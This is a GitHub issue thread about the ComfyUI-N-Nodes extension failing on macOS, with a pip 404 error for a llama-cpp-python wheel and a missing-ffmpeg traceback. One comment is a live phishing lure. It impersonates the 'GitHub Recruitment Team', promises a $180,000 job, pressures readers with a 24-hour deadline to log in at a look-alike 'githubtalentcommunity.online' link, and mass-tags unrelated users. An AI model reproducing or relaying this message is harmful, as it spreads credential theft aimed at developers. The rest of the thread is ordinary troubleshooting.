### ISSUE TITLE
Does this node not work on Mac OS?

### ISSUE THREAD

**Issue by starofjudas** [Nuked88/ComfyUI-N-Nodes#31]
Does this node not work on Mac OS? I want to use that node on my MacBook, but when I install it, the node doesn't exist.

**Comment by Nuked88** [comment]
uhm, i'm not really sure because i don't own a mac :(

**Comment by starofjudas** [comment]
Any thoughts on further development to make it run well on Mac?

**Comment by ludzeller** [comment]
I get this log output after installing your package with Stability Matrix for ComfyUI. The output is generated when starting ComfyUI using Stability Matrix. So llama.cpp and ffmpeg needs fixing. The latter is actually installed on my M1 Mac running MacOS 13.6.3.

 ERROR: HTTP error 404 while getting https://github.com/abetlen/llama-cpp-python/releases/download/v0.2.39/llama_cpp_python-0.2.39-cp310-cp310-macosx_13_0_arm64.whl
ERROR: Could not install requirement llama-cpp-python==0.2.39 from https://github.com/abetlen/llama-cpp-python/releases/download/v0.2.39/llama_cpp_python-0.2.39-cp310-cp310-macosx_13_0_arm64.whl because of HTTP error 404 Client Error: Not Found for url: https://github.com/abetlen/llama-cpp-python/releases/download/v0.2.39/llama_cpp_python-0.2.39-cp310-cp310-macosx_13_0_arm64.whl for URL https://github.com/abetlen/llama-cpp-python/releases/download/v0.2.39/llama_cpp_python-0.2.39-cp310-cp310-macosx_13_0_arm64.whl
Error while installing LLAMA: Command '['/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/bin/python3', '-m', 'pip', 'install', 'https://github.com/abetlen/llama-cpp-python/releases/download/v0.2.39/llama_cpp_python-0.2.39-cp310-cp310-macosx_13_0_arm64.whl']' returned non-zero exit status 1.
Downloading dependencies...
Traceback (most recent call last):
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/custom_nodes/ComfyUI-N-Nodes/__init__.py", line 46, in <module>
    spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/custom_nodes/ComfyUI-N-Nodes/py/video_node.py", line 12, in <module>
    from moviepy.editor import VideoFileClip, AudioFileClip
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/moviepy/editor.py", line 36, in <module>
    from .video.io.VideoFileClip import VideoFileClip
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/moviepy/video/io/VideoFileClip.py", line 3, in <module>
    from moviepy.audio.io.AudioFileClip import AudioFileClip
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/moviepy/audio/io/AudioFileClip.py", line 3, in <module>
    from moviepy.audio.AudioClip import AudioClip
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/moviepy/audio/AudioClip.py", line 7, in <module>
    from moviepy.audio.io.ffmpeg_audiowriter import ffmpeg_audiowrite
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/moviepy/audio/io/ffmpeg_audiowriter.py", line 7, in <module>
    from moviepy.config import get_setting
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/moviepy/config.py", line 36, in <module>
    FFMPEG_BINARY = get_exe()
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/imageio/plugins/ffmpeg.py", line 173, in get_exe
    return imageio_ffmpeg.get_ffmpeg_exe()
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/venv/lib/python3.10/site-packages/imageio_ffmpeg/_utils.py", line 34, in get_ffmpeg_exe
    raise RuntimeError(
RuntimeError: No ffmpeg exe could be found. Install ffmpeg on your system, or set the IMAGEIO_FFMPEG_EXE environment variable.
Traceback (most recent call last):
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/custom_nodes/ComfyUI-N-Nodes/__init__.py", line 46, in <module>
    spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "/Users/ludwig/Library/Application Support/StabilityMatrix/Packages/ComfyUI/custom_nodes/ComfyUI-N-Nodes/py/gptcpp_node.py", line 3, in <module>
    from llama_cpp import Llama
ModuleNotFoundError: No module named 'llama_cpp'

**Comment by Nuked88** [comment]
Since I don't own a Mac I cannot fix this for now

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
MaybeShewill-CV, @robertgg1314, @mattanimation, @dalton-lee, @ZhengPeng7, @YYvanYang, @myimilo, @appleparan, @selat, @lunchforsoup, @vonfeng, @vithursant, @ThomasFabula, @kaznak, @wangbai, @czaloom, @ngan-nt, @KAZU-kaa, @nutorbit, @matpaolacci

**Comment by andrew-k-sett** [comment]
Doesn't work with Ubuntu as well (((
